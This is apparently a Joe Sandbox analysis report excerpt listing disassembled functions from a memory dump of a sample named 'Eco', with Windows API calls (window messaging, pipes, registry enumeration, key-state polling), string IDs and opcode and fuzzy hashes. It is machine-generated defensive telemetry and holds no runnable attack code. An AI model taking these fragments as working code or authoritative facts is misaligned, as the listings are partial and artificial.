                          • Opcode ID: 0aba10454a56deb4764e48954eb35ee61a46dd7ac477646572382332030d9789
                          • Instruction ID: 4d6fc87ad0d45529933b52f77c8144111bf660459cbd7cdfeedaa9d3bc6c68bc
                          • Opcode Fuzzy Hash: 0aba10454a56deb4764e48954eb35ee61a46dd7ac477646572382332030d9789
                          • Instruction Fuzzy Hash: DC318E7090062AAFCF00EF94C951DFEBBB4FF95314B108629E826A72D1DB71AD05CB90
                          APIs
                            • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                            • Part of subcall function 0056B57D: GetClassNameW.USER32(?,?,000000FF), ref: 0056B5A0
                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 005698AF
                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 005698C2
                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 005698F2
                            • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend$_memmove$ClassName
                          • String ID: ComboBox$ListBox
                          • API String ID: 365058703-1403004172
                          • Opcode ID: 307257ec7613ddc171b8ede741774f38bb8bbf6524d1373c8a5f2599ea4088e4
                          • Instruction ID: bc1b1e824b5879f140548c72b4fa73b0a6acaa9efbd49db7b0e1b57b9398f619
                          • Opcode Fuzzy Hash: 307257ec7613ddc171b8ede741774f38bb8bbf6524d1373c8a5f2599ea4088e4
                          • Instruction Fuzzy Hash: 42210571A40109BEDB24ABA4DC8ADFFBF6CFFA2364F104119F421A72E1DB354D499660
                          APIs
                            • Part of subcall function 00512111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0051214F
                            • Part of subcall function 00512111: GetStockObject.GDI32(00000011), ref: 00512163
                            • Part of subcall function 00512111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0051216D
                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0059684E
                          • LoadLibraryW.KERNEL32(?), ref: 00596855
                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0059686A
                          • DestroyWindow.USER32(?), ref: 00596872
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                          • String ID: SysAnimate32
                          • API String ID: 4146253029-1011021900
                          • Opcode ID: f3c895d129152b9781ef794f8bf171bcaa4035386599c2a75e4063e4f73f9df6
                          • Instruction ID: 1db32e3af0397640197c5ff3d30cfd8bc6b10c65483c5eb90fa0bc332c98fd5b
                          • Opcode Fuzzy Hash: f3c895d129152b9781ef794f8bf171bcaa4035386599c2a75e4063e4f73f9df6
                          • Instruction Fuzzy Hash: EF218B71600206AFEF104FA49C84EBB7BE9FB59328F144629FA5093090D731DC59A760
                          APIs
                          • GetStdHandle.KERNEL32(0000000C), ref: 005771E4
                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00577217
                          • GetStdHandle.KERNEL32(0000000C), ref: 00577229
                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00577263
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CreateHandle$FilePipe
                          • String ID: nul
                          • API String ID: 4209266947-2873401336
                          • Opcode ID: c191db41aa8c167a42115ef5b895b1a5b85de3201beef95a179485e71b570382
                          • Instruction ID: f2a323eaab3ee640e7e0d9be8b4985d5c54c6df05a2079d7f55f9b7b17b80c44
                          • Opcode Fuzzy Hash: c191db41aa8c167a42115ef5b895b1a5b85de3201beef95a179485e71b570382
                          • Instruction Fuzzy Hash: 2F217F7450430AABDB209F69FC08E9A7FA4BF59720F208A19FCB8D72D0D7709850EB50
                          APIs
                          • GetStdHandle.KERNEL32(000000F6), ref: 005772B1
                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 005772E3
                          • GetStdHandle.KERNEL32(000000F6), ref: 005772F4
                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 0057732E
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CreateHandle$FilePipe
                          • String ID: nul
                          • API String ID: 4209266947-2873401336
                          • Opcode ID: d3d84ae25e97958a546063c5a777d6e924052b51271c52d82fa89085ba2a1b47
                          • Instruction ID: f0cb3457a27649b6a2aab5a7dd3e766d76ca851073fe3c6f906dc16bab5e1e6e
                          • Opcode Fuzzy Hash: d3d84ae25e97958a546063c5a777d6e924052b51271c52d82fa89085ba2a1b47
                          • Instruction Fuzzy Hash: 1B21927560830A9BDB209F69BC08AA97BE8BF59730F204B19FCB4D32D1D7709850EB51
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 0057B104
                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0057B158
                          • __swprintf.LIBCMT ref: 0057B171
                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,005A0980), ref: 0057B1AF
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ErrorMode$InformationVolume__swprintf
                          • String ID: %lu
                          • API String ID: 3164766367-685833217
                          • Opcode ID: 99ca7ed2225e1e21d826bd300299418f576cedf96e99e78f54160e6b500f2723
                          • Instruction ID: cd907334781ee45e8d11f8754569c2b92cf07bdf1e6eb5d123115beccadb0ffb
                          • Opcode Fuzzy Hash: 99ca7ed2225e1e21d826bd300299418f576cedf96e99e78f54160e6b500f2723
                          • Instruction Fuzzy Hash: AB218134A00209AFCB10DB64D949EAEBBB8FF89314B108068F409D7291DB31AA45DB61
                          APIs
                            • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                            • Part of subcall function 0056A835: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0056A852
                            • Part of subcall function 0056A835: GetWindowThreadProcessId.USER32(?,00000000), ref: 0056A865
                            • Part of subcall function 0056A835: GetCurrentThreadId.KERNEL32 ref: 0056A86C
                            • Part of subcall function 0056A835: AttachThreadInput.USER32(00000000), ref: 0056A873
                          • GetFocus.USER32 ref: 0056AA0D
                            • Part of subcall function 0056A87E: GetParent.USER32(?), ref: 0056A88C
                          • GetClassNameW.USER32(?,?,00000100), ref: 0056AA56
                          • EnumChildWindows.USER32(?,0056AACE), ref: 0056AA7E
                          • __swprintf.LIBCMT ref: 0056AA98
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                          • String ID: %s%d
                          • API String ID: 1941087503-1110647743
                          • Opcode ID: 06eb54fc6414f2c55a6bfbba2000ddeb4c38db62393f513a8e353086b418e5a1
                          • Instruction ID: 1a0a5ac532fc11b591b7fff197a98ab6dec4298f430dfae7285f53c4a804b931
                          • Opcode Fuzzy Hash: 06eb54fc6414f2c55a6bfbba2000ddeb4c38db62393f513a8e353086b418e5a1
                          • Instruction Fuzzy Hash: FE117271600206ABDF11BFA09D8AFEA3F6CBF85700F044069BD18AB182DA705945DF71
                          APIs
                          • CharUpperBuffW.USER32(?,?), ref: 00572184
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: BuffCharUpper
                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                          • API String ID: 3964851224-769500911
                          • Opcode ID: 8b1889ac7ee8b342a6df14a10429953489aa31b9204f31f1c036d4fe3818c5f1
                          • Instruction ID: db1eb46d557caefb6bbce93ed65069d62bd410d494e949572d2c1b78ad78648c
                          • Opcode Fuzzy Hash: 8b1889ac7ee8b342a6df14a10429953489aa31b9204f31f1c036d4fe3818c5f1
                          • Instruction Fuzzy Hash: 2C118E30900119CFCF04EFA4D8659FEBBB4FFA5304F9095A8D829A7292DB325D16DB40
                          APIs
                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0058F0B8
                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0058F0E8
                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0058F21B
                          • CloseHandle.KERNEL32(?), ref: 0058F29C
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                          • String ID:
                          • API String ID: 2364364464-0
                          • Opcode ID: fc2593644249a3017c79084e6463db9d03262e43bff9a093eeadbe8e243a3916
                          • Instruction ID: bef23557570188b82d45216de4ba199fc30588f74ca8d2a6ba22e55b93c7ceb5
                          • Opcode Fuzzy Hash: fc2593644249a3017c79084e6463db9d03262e43bff9a093eeadbe8e243a3916
                          • Instruction Fuzzy Hash: E28162B56007019FE720EF68D84AF6ABBE5BF88710F14891DF959DB292D770AC808F51
                          APIs
                            • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                            • Part of subcall function 00591242: CharUpperBuffW.USER32(?,?,?,?,?,?,?,005901D5,?,?), ref: 00591259
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00590525
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00590564
                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 005905AB
                          • RegCloseKey.ADVAPI32(?,?), ref: 005905D7
                          • RegCloseKey.ADVAPI32(00000000), ref: 005905E4
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                          • String ID:
                          • API String ID: 3440857362-0
                          • Opcode ID: 24e338a1104cfcb241cd33248701a108b9dbfbd2cd0dce3b9d3d96a5c8248662
                          • Instruction ID: b41241171b1a3c0675b9f3b2c89c20f0cbc91707633930b7cecf35ac0c1a0744
                          • Opcode Fuzzy Hash: 24e338a1104cfcb241cd33248701a108b9dbfbd2cd0dce3b9d3d96a5c8248662
                          • Instruction Fuzzy Hash: 43515771208205AFDB14EF64D885E6BBBE8BF85304F00591DF596872E1EB30E905CF52
                          APIs
                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0057EACF
                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0057EAF8
                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0057EB37
                            • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
                            • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0057EB5C
                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0057EB64
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                          • String ID:
                          • API String ID: 1389676194-0
                          • Opcode ID: 9cb3d1fa9cb3d05fbfc1b8bbcaf53a02aeb21a4abc465f389d87f564f60e484c
                          • Instruction ID: 30bbc97a1e10459d31e98f16085d843db64c8a4679dcda0ed86e9d381198110a
                          • Opcode Fuzzy Hash: 9cb3d1fa9cb3d05fbfc1b8bbcaf53a02aeb21a4abc465f389d87f564f60e484c
                          • Instruction Fuzzy Hash: D5512875A00606DFDF01EF64D985AAEBBF5FF49310B148099E809AB3A1CB31AD51DF50
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2abb506cd694a3e5317cd92d7a5699d8e951795e39f219f580ea6c08063d15f2
                          • Instruction ID: b9ccde297851aaaaa1f7c5c19bdc86ebbbf5a78d80f7a1630e71ce4c88efb314
                          • Opcode Fuzzy Hash: 2abb506cd694a3e5317cd92d7a5699d8e951795e39f219f580ea6c08063d15f2
                          • Instruction Fuzzy Hash: 3841C335A00214AFDF20DF68CC48FA9BFA4FB4A310F150155E819A72D1D770AE55EAE2
                          APIs
                          • GetCursorPos.USER32(?), ref: 00512727
                          • ScreenToClient.USER32(005D67B0,?), ref: 00512744
                          • GetAsyncKeyState.USER32(00000001), ref: 00512769
                          • GetAsyncKeyState.USER32(00000002), ref: 00512777
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: AsyncState$ClientCursorScreen
                          • String ID:
                          • API String ID: 4210589936-0
                          • Opcode ID: 8731950a04a09b8407667a3ecc1937e5e857a0ec31bf4783b226a37dde0351d7
                          • Instruction ID: 89c7bdde049410b4b82ebd66db6a65681d4dbc051d75feec4c474df803dd1e03
                          • Opcode Fuzzy Hash: 8731950a04a09b8407667a3ecc1937e5e857a0ec31bf4783b226a37dde0351d7
                          • Instruction Fuzzy Hash: 9141813560910AFFDF159FA4C848AEABF74FB46324F10435AF868922D0C770A9A4DB90
                          APIs
                          • GetWindowRect.USER32(?,?), ref: 005693CB
                          • PostMessageW.USER32(?,00000201,00000001), ref: 00569475
                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0056947D
                          • PostMessageW.USER32(?,00000202,00000000), ref: 0056948B
                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00569493
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessagePostSleep$RectWindow
                          • String ID:
                          • API String ID: 3382505437-0
                          • Opcode ID: dbbd87a4d9c9f67d4a1bdd54edd3c2a5ece6849eeba2152714678f367249aafe
                          • Instruction ID: 0819480cf137075aa14e80e66e9a7c15bccb27435a39415432dd92a2f06bd1d5
                          • Opcode Fuzzy Hash: dbbd87a4d9c9f67d4a1bdd54edd3c2a5ece6849eeba2152714678f367249aafe
                          • Instruction Fuzzy Hash: 8331BC71500219EBDF14CFA8D94CAAE3BB9FB45326F108229F925AB2D0C7B09915DB91
                          APIs
                          • IsWindowVisible.USER32(?), ref: 0056BB80
                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0056BB9D
                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0056BBD5
                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0056BBFB
                          • _wcsstr.LIBCMT ref: 0056BC05
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                          • String ID:
                          • API String ID: 3902887630-0
                          • Opcode ID: 8814ef365048eb3fcba0a95eea723591641078076fe4e0a3217328ecf566abd0
                          • Instruction ID: 6940dfbfbcddfd0eb009e4bf4f888065947a916e65e435d9bfac316623792348
                          • Opcode Fuzzy Hash: 8814ef365048eb3fcba0a95eea723591641078076fe4e0a3217328ecf566abd0
                          • Instruction Fuzzy Hash: 3021F6322042057BFB255B399C49E7B7FA8FF85760F108129F805CB1A1EF71DD9196A0
                          APIs
                            • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                          • GetWindowLongW.USER32(?,000000F0), ref: 0059B57F
                          • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0059B5A4
                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0059B5BC
                          • GetSystemMetrics.USER32(00000004), ref: 0059B5E5
                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00581340,00000000), ref: 0059B603
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Window$Long$MetricsSystem
                          • String ID:
                          • API String ID: 2294984445-0
                          • Opcode ID: 7147396c56d257f60aa2d67bc1d3636e3d13958d1d43e7e638aaeee76dc5c12f
                          • Instruction ID: 10cc772bcbb6381138190d5556cf56296e5bf19705698d56a69f39b8a43aadff
                          • Opcode Fuzzy Hash: 7147396c56d257f60aa2d67bc1d3636e3d13958d1d43e7e638aaeee76dc5c12f
                          • Instruction Fuzzy Hash: 9F21B271911215AFEF209F39ED08B6A3FA5FB15321F124729F922D31E0E7309951DB80
                          APIs
                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00511729
                          • SelectObject.GDI32(?,00000000), ref: 00511738
                          • BeginPath.GDI32(?), ref: 0051174F
                          • SelectObject.GDI32(?,00000000), ref: 00511778
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ObjectSelect$BeginCreatePath
                          • String ID:
                          • API String ID: 3225163088-0
                          • Opcode ID: b060e43c93b292341106413ea051987b13d45c6f367ef55890fcc3079144beb2
                          • Instruction ID: 38605ccff383bf32f32ee1c8535ec0590640ca43fd2bd1c6a3c8522fdca29c79
                          • Opcode Fuzzy Hash: b060e43c93b292341106413ea051987b13d45c6f367ef55890fcc3079144beb2
                          • Instruction Fuzzy Hash: A821AF70802608EBEB209F64DC487A97FF8FB20321F144257F910A22E0D77198DAFB95
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _memcmp
                          • String ID:
                          • API String ID: 2931989736-0
                          • Opcode ID: ccf6d9a3734ff45ed753548dec4ec52170de43b3d8f9947f7cc95f9ef3119a6b
                          • Instruction ID: 83c1a7d8f98d82f31dca60344352cc73f609756182b9916330d1389648b65eff
                          • Opcode Fuzzy Hash: ccf6d9a3734ff45ed753548dec4ec52170de43b3d8f9947f7cc95f9ef3119a6b
                          • Instruction Fuzzy Hash: 1501B1B2A0050A7BD2106669DD42FBB7F5CBE91398F009426FD49D7242EA60DE1086BC
                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 00574EE2
